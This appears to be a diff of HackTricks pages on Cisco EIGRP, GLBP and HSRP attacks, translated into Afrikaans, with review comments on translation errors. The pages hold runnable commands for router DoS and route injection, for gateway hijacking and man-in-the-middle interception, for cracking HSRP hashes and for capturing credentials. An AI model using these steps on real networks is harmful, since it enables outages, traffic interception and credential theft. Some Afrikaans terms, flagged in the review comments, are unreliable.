* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.

</details>

**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information.
**Hierdie is 'n opsomming van die aanvalle wat blootgestel word in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Kyk daar vir verdere inligting.

## **Fake EIGRP Neighbors Attack**

- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.
- **Tool**: **helloflooding.py** script.
- **Execution**:
%%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%%
## **Valse EIGRP Buurnavorsingsaanval**

- **Doelwit**: Om roeterverwerkers te oorlaai deur hulle te oorstroom met EIGRP-hallo-pakette, wat moontlik kan lei tot 'n Denial of Service (DoS)-aanval.
- **Instrument**: **helloflooding.py**-skrips.
- **Uitvoering**:
%%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%%
- **Parameters**:
- `--interface`: Specifies the network interface, e.g., `eth0`.
- `--as`: Defines the EIGRP autonomous system number, e.g., `1`.
- `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`.
- `--interface`: Spesifiseer die netwerkinterface, bv. `eth0`.
- `--as`: Definieer die EIGRP outonome stelselnommer, bv. `1`.
- `--subnet`: Stel die subnetligging in, bv. `10.10.100.0/24`.

## **EIGRP Blackhole Attack**
## **EIGRP Swartgate-aanval**

- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.
- **Tool**: **routeinject.py** script.
- **Execution**:
%%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%%
- **Doelwit**: Om netwerkverkeersvloei te ontwrig deur 'n valse roete in te spuit, wat lei tot 'n swartgate waar die verkeer na 'n nie-bestaande bestemming gerig word.
- **Instrument**: **routeinject.py**-skrips.
- **Uitvoering**:
%%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%%
- **Parameters**:
- `--interface`: Specifies the attacker’s system interface.
- `--as`: Defines the EIGRP AS number.
- `--src`: Sets the attacker’s IP address.
- `--dst`: Sets the target subnet IP.
- `--prefix`: Defines the mask of the target subnet IP.
- `--interface`: Spesifiseer die aanvaller se stelselkoppelvlak.
- `--as`: Definieer die EIGRP AS-nommer.
- `--src`: Stel die aanvaller se IP-adres in.
- `--dst`: Stel die teikensubnet-IP in.
- `--prefix`: Definieer die masker van die teikensubnet-IP.

## **Abusing K-Values Attack**
## **Misbruik van K-Waardes-aanval**

- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.
- **Tool**: **relationshipnightmare.py** script.
- **Execution**:
%%%bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
%%%
- **Doelwit**: Om voortdurende ontwrigting en herverbindings binne die EIGRP-domein te skep deur gewysigde K-waardes in te spuit, wat effektief lei tot 'n DoS-aanval.
- **Instrument**: **relationshipnightmare.py**-skrips.
- **Uitvoering**:
%%%bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
%%%
- **Parameters**:
- `--interface`: Specifies the network interface.
- `--as`: Defines the EIGRP AS number.
- `--src`: Sets the IP Address of a legitimate router.
- `--interface`: Spesifiseer die netwerkinterface.
- `--as`: Definieer die EIGRP AS-nommer.
- `--src`: Stel die IP-adres van 'n geldige roeterverwerker in.

## **Routing Table Overflow Attack**
## **Roetertabel-oorloopaanval**

- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes.
- **Tool**: **routingtableoverflow.py** script.
- **Execution**:
%%%bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%%
- **Doelwit**: Om die roeterverwerker se CPU en RAM te belas deur die roetertabel met talle valse roetes te oorstroom.
- **Instrument**: **routingtableoverflow.py**-skrips.
- **Uitvoering**:
%%%bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%%
- **Parameters**:
- `--interface`: Specifies the network interface.
- `--as`: Defines the EIGRP AS number.
- `--src`: Sets the attacker’s IP address.
- `--interface`: Spesifiseer die netwerkinterface.
- `--as`: Definieer die EIGRP AS-nommer.
- `--src`: Stel die aanvaller se IP-adres in.

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.

</details>

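Review bot: two translations in this hunk change the technical meaning. The heading `## **Valse EIGRP Buurnavorsingsaanval**` renders "Fake EIGRP Neighbors" as "neighbour research"; the attack forges EIGRP neighbours, so `Valse EIGRP-bure-aanval` is the intended sense. Under the K-values attack, `--src`: `Stel die IP-adres van 'n geldige roeterverwerker in` turns "a legitimate router" into "a valid router processor", while the parameter is the address of a real router whose identity the script spoofs; `'n wettige roeter` keeps that. The same `roeterverwerker` ("router processor") appears in `Om die roeterverwerker se CPU en RAM te belas`, where plain `roeter` is enough. `Swartgate` for blackhole is also odd; the page keeps `Denial of Service (DoS)` untranslated, and `blackhole` is normally kept the same way.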
@ -1,63 +1,62 @@
# GLBP & HSRP Attacks
# GLBP & HSRP Aanvalle

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.

</details>

## FHRP Hijacking Overview
## FHRP Kapingsoorsig

### Insights into FHRP
FHRP is designed to provide network robustness by merging multiple routers into a single virtual unit, thereby enhancing load distribution and fault tolerance. Cisco Systems introduced prominent protocols in this suite, such as GLBP and HSRP.
### Insig in FHRP
FHRP is ontwerp om netwerk-robuustheid te bied deur verskeie roeteryers in 'n enkele virtuele eenheid te kombineer, wat sodoende lasverspreiding en fouttoleransie verbeter. Cisco Systems het prominente protokolle in hierdie pakket geïntroduceer, soos GLBP en HSRP.

### GLBP Protocol Insights
Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified.
### GLBP-protokol-insig
GLBP, 'n skepping van Cisco, werk op die TCP/IP-stapel en maak gebruik van UDP op poort 3222 vir kommunikasie. Roeteryers in 'n GLBP-groep ruil "hallo" pakkies uit met tussenposes van 3 sekondes. As 'n roeteryer nie hierdie pakkies vir 10 sekondes stuur nie, word dit as aflyn beskou. Hierdie tydmetings is egter nie vas nie en kan gewysig word.

### GLBP Operations and Load Distribution
GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms:
### GLBP-bedrywighede en lasverspreiding
GLBP onderskei homself deur lasverspreiding oor roeteryers moontlik te maak deur gebruik te maak van 'n enkele virtuele IP gekoppel aan verskeie virtuele MAC-adresse. In 'n GLBP-groep is elke roeteryer betrokke by pakketsending. In teenstelling met HSRP/VRRP bied GLBP ware lasbalansering deur verskeie meganismes:

- **Host-Dependent Load Balancing:** Maintains consistent AVF MAC address assignment to a host, essential for stable NAT configurations.
- **Round-Robin Load Balancing:** The default approach, alternating AVF MAC address assignment among requesting hosts.
- **Weighted Round-Robin Load Balancing:** Distributes load based on predefined "Weight" metrics.
- **Gasheer-afhanklike lasbalansering:** Handhaaf 'n konstante AVF MAC-adres toewysing aan 'n gasheer, wat noodsaaklik is vir stabiele NAT-konfigurasies.
- **Round-Robin Lasbalansering:** Die verstekbenadering, waar AVF MAC-adres toewysing afwisselend aan versoekende gasheerders gedoen word.
- **Geweegde Round-Robin Lasbalansering:** Versprei die las gebaseer op voorafbepaalde "Gewig" metriek.

### Key Components and Terminologies in GLBP
- **AVG (Active Virtual Gateway):** The main router, responsible for allocating MAC addresses to peer routers.
- **AVF (Active Virtual Forwarder):** A router designated to manage network traffic.
- **GLBP Priority:** A metric that determines the AVG, starting at a default of 100 and ranging between 1 and 255.
- **GLBP Weight:** Reflects the current load on a router, adjustable either manually or through Object Tracking.
- **GLBP Virtual IP Address:** Serves as the network's default gateway for all connected devices.
### Sleutelkomponente en terminologieë in GLBP
- **AVG (Aktiewe Virtuele Gateway):** Die hoofroeteryer, verantwoordelik vir die toekenning van MAC-adresse aan eweknie-roeteryers.
- **AVF (Aktiewe Virtuele Stuurder):** 'n Roeteryer wat aangewys is om netwerkverkeer te bestuur.
- **GLBP-prioriteit:** 'n Metriek wat die AVG bepaal, begin by 'n verstekwaarde van 100 en wissel tussen 1 en 255.
- **GLBP-gewig:** Weerspieël die huidige las op 'n roeteryer, wat handmatig of deur middel van Objekopsporing aangepas kan word.
- **GLBP Virtuele IP-adres:** Diens as die netwerk se verstekpoort vir alle gekoppelde toestelle.

For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UDP port 3222. Routers transmit "hello" packets at 3-second intervals, and are considered non-operational if a packet is missed over a 10-second duration.
Vir interaksie maak GLBP gebruik van die voorbehoude multicast-adres 224.0.0.102 en UDP-poort 3222. Roeteryers stuur "hallo" pakkies uit met tussenposes van 3 sekondes, en word as nie-operasioneel beskou as 'n pakkie oor 'n tydperk van 10 sekondes gemis word.

### GLBP Attack Mechanism
An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
### GLBP-aanvalsmeganisme
'n Aanvaller kan die primêre roeteryer word deur 'n GLBP-pakket met die hoogste prioriteitswaarde (255) te stuur. Dit kan lei tot DoS- of MITM-aanvalle, wat verkeersonderskepping of omleiding moontlik maak.

### Executing a GLBP Attack with Loki
[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
### Uitvoering van 'n GLBP-aanval met Loki
[Loki](https://github.com/raizo62/loki_on_kali) kan 'n GLBP-aanval uitvoer deur 'n pakket in te spuit met prioriteit en gewig wat op 255 gestel is. Voor-aanvalstappe behels die versameling van inligting soos die virtuele IP-adres, die teenwoordigheid van verifikasie en die prioriteitswaardes van die roeteryer deur middel van hulpmiddels soos Wireshark.

Attack Steps:
1. Switch to promiscuous mode and enable IP forwarding.
2. Identify the target router and retrieve its IP.
3. Generate a Gratuitous ARP.
4. Inject a malicious GLBP packet, impersonating the AVG.
5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP.
6. Implement SNAT for complete traffic visibility.
7. Adjust routing to ensure continued internet access through the original AVG router.
Aanvalstappe:
1. Skakel na promiskueuse modus en aktiveer IP-deurstuur.
2. Identifiseer die teikenroeteryer en haal sy IP op.
3. Genereer 'n Gratis ARP.
4. Spuit 'n kwaadwillige GLBP-pakket in, wat die AVG naboots.
5. Ken 'n sekondêre IP-adres toe aan die aanvaller se netwerkinterface, wat die GLBP virtuele IP naboots.
6. Implementeer SNAT vir volledige verkeersigbaarheid.
7. Pas roetebepaling aan om voortgesette internettoegang deur die oorspronklike AVG-roeteryer te verseker.

By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.

For demonstration, here are the required command snippets:
Deur hierdie stappe te volg, plaas die aanvaller homself as 'n "man in die middel", wat in staat is om netwerkverkeer te onderskep en te analiseer, insluitend onversleutelde of sensitiewe data.

Vir demonstrasie, hier is die vereiste opdragfragmente:
```bash
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
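Review bot: protocol and feature names were translated literally where they should stay as-is. Step 3 `Genereer 'n Gratis ARP` turns "Gratuitous ARP" into "free ARP"; keep `Gratuitous ARP`, which is the term any reader will search for. `Objekopsporing` in the GLBP Weight entry stands for Cisco's `Object Tracking` feature and should keep that name. In the same list, `Diens as die netwerk se verstekpoort` has a typo (`Dien as`) and `verstekpoort` means default port, not default gateway (`verstekgateway` or `verstekroete`). The coinage `roeteryers` for routers is used throughout this file, whereas the EIGRP file in this commit uses `roeter`; pick one term.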
@ -71,82 +70,79 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
### Passiewe Verduideliking van HSRP-ontvoering met Opdragbesonderhede

Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
#### Oorsig van HSRP (Hot Standby Router/Redundancy Protocol)
HSRP is 'n Cisco-eienaardige protokol wat ontwerp is vir netwerkgateway-herstelbaarheid. Dit maak die konfigurasie van verskeie fisiese roeteryers moontlik in 'n enkele logiese eenheid met 'n gedeelde IP-adres. Hierdie logiese eenheid word bestuur deur 'n primêre router wat verantwoordelik is vir die rigting van verkeer. In teenstelling met GLBP, wat metriese soos prioriteit en gewig gebruik vir vragbalansering, steun HSRP op 'n enkele aktiewe router vir verkeersbestuur.

### Passive Explanation of HSRP Hijacking with Command Details
#### Rolle en Terminologie in HSRP
- **HSRP Aktiewe Router**: Die toestel wat as die gateway optree en verkeersvloei bestuur.
- **HSRP Standby Router**: 'n Rugsteunroeter wat gereed is om oor te neem as die aktiewe router misluk.
- **HSRP Groep**: 'n Stel roeteryers wat saamwerk om 'n enkele veerkragtige virtuele router te vorm.
- **HSRP MAC-adres**: 'n Virtuele MAC-adres wat aan die logiese router in die HSRP-opstelling toegewys is.
- **HSRP Virtuele IP-adres**: Die virtuele IP-adres van die HSRP-groep wat optree as die verstekroete vir gekoppelde toestelle.

#### Overview of HSRP (Hot Standby Router/Redundancy Protocol)
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
#### HSRP-weergawes
HSRP kom in twee weergawes voor, HSRPv1 en HSRPv2, wat hoofsaaklik verskil in groepskapasiteit, multicast IP-gebruik en virtuele MAC-adresstruktuur. Die protokol maak gebruik van spesifieke multicast IP-adresse vir diensinligtinguitruiling, met Hello-pakette wat elke 3 sekondes gestuur word. 'n Router word as onaktief beskou as geen pakket binne 'n interval van 10 sekondes ontvang word nie.

#### Roles and Terminology in HSRP
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.
#### HSRP-aanvalsmeganisme
HSRP-aanvalle behels die gedwonge oorneem van die rol van die Aktiewe Router deur 'n maksimum prioriteitswaarde in te spuit. Dit kan lei tot 'n Man-In-The-Middle (MITM) aanval. Essensiële voor-aanvalstappe sluit in die versameling van data oor die HSRP-opstelling, wat gedoen kan word deur Wireshark vir verkeersanalise.
|
||||
|
||||
#### HSRP Versions
|
||||
HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.
|
||||
#### Stappe om HSRP-verifikasie te omseil
|
||||
1. Stoor die netwerkverkeer wat HSRP-data bevat as 'n .pcap-lêer.
|
||||
```shell
|
||||
tcpdump -w hsrp_traffic.pcap
|
||||
```
|
||||
2. Haal MD5-hashes uit die .pcap-lêer met behulp van hsrp2john.py.
|
||||
```shell
|
||||
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
|
||||
```
|
||||
3. Kraak die MD5-hashes met behulp van John the Ripper.
|
||||
```shell
|
||||
john --wordlist=mywordlist.txt hsrp_hashes
|
||||
```
|
||||
|
||||
#### HSRP Attack Mechanism
|
||||
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
|
||||
**Uitvoering van HSRP-inspuiting met Loki**
|
||||
|
||||
#### Steps for Bypassing HSRP Authentication
|
||||
1. Save the network traffic containing HSRP data as a .pcap file.
|
||||
```shell
|
||||
tcpdump -w hsrp_traffic.pcap
|
||||
```
|
||||
2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
|
||||
```shell
|
||||
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
|
||||
```
|
||||
3. Crack the MD5 hashes using John the Ripper.
|
||||
```shell
|
||||
john --wordlist=mywordlist.txt hsrp_hashes
|
||||
```
|
||||
1. Begin Loki om HSRP-advertensies te identifiseer.
|
||||
2. Stel die netwerkinterface in promiskue modus en aktiveer IP-deurstuur.
|
||||
```shell
|
||||
sudo ip link set eth0 promisc on
|
||||
sudo sysctl -w net.ipv4.ip_forward=1
|
||||
```
|
||||
3. Gebruik Loki om die spesifieke router te teiken, voer die gekraakte HSRP-wagwoord in en doen die nodige konfigurasies om die Aktiewe Router na te boots.
|
||||
4. Nadat die Aktiewe Router-rol verkry is, konfigureer jou netwerkinterface en IP-tabelle om die wettige verkeer te onderskep.
|
||||
```shell
|
||||
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
|
||||
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||||
```
|
||||
5. Wysig die roetetabel om verkeer deur die vorige Aktiewe Router te roeteer.
|
||||
```shell
|
||||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
6. Gebruik net-creds.py of 'n soortgelyke hulpprogram om legitimasie-inligting van die onderskepte verkeer vas te vang.
|
||||
```shell
|
||||
sudo python2 net-creds.py -i eth0
|
||||
```
|
||||
|
||||
**Executing HSRP Injection with Loki**
|
||||
|
||||
1. Launch Loki to identify HSRP advertisements.
|
||||
2. Set the network interface to promiscuous mode and enable IP forwarding.
|
||||
```shell
|
||||
sudo ip link set eth0 promisc on
|
||||
sudo sysctl -w net.ipv4.ip_forward=1
|
||||
```
|
||||
3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
|
||||
4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
|
||||
```shell
|
||||
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
|
||||
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||||
```
|
||||
5. Modify the routing table to route traffic through the former Active Router.
|
||||
```shell
|
||||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
|
||||
```shell
|
||||
sudo python2 net-creds.py -i eth0
|
||||
```
|
||||
|
||||
Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.
|
||||
Deur hierdie stappe uit te voer, plaas die aanvaller hom in 'n posisie om verkeer te onderskep en te manipuleer, soortgelyk aan die prosedure vir GLBP-ontvoering. Dit beklemtoon die kwesbaarheid in herstelbaarheidsprotokolle soos HSRP en die behoefte aan robuuste sekuriteitsmaatreëls.
|
||||
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
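Review bot: "Cisco-eienaardige protokol" in the HSRP overview ("HSRP is 'n Cisco-eienaardige protokol wat ontwerp is vir netwerkgateway-herstelbaarheid.") mistranslates "Cisco proprietary protocol": "eienaardig" means peculiar or odd, so the sentence currently says HSRP is a strange Cisco protocol. "Cisco se eie protokol" or "'n Cisco-eie protokol" carries the intended meaning. In the same sentence, and again in the closing paragraph ("herstelbaarheidsprotokolle soos HSRP"), "redundancy" is rendered as "herstelbaarheid" (recoverability); "oortolligheid" or the loanword "redundansie" matches the English line, and the distinction matters because the section describes abuse of a redundancy election, not of a recovery mechanism. The translation also alternates between "roeteryers", "Rugsteunroeter" and "Router" for the same word within a few lines of the roles list; settle on one term there as well.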
@ -1,75 +1,71 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
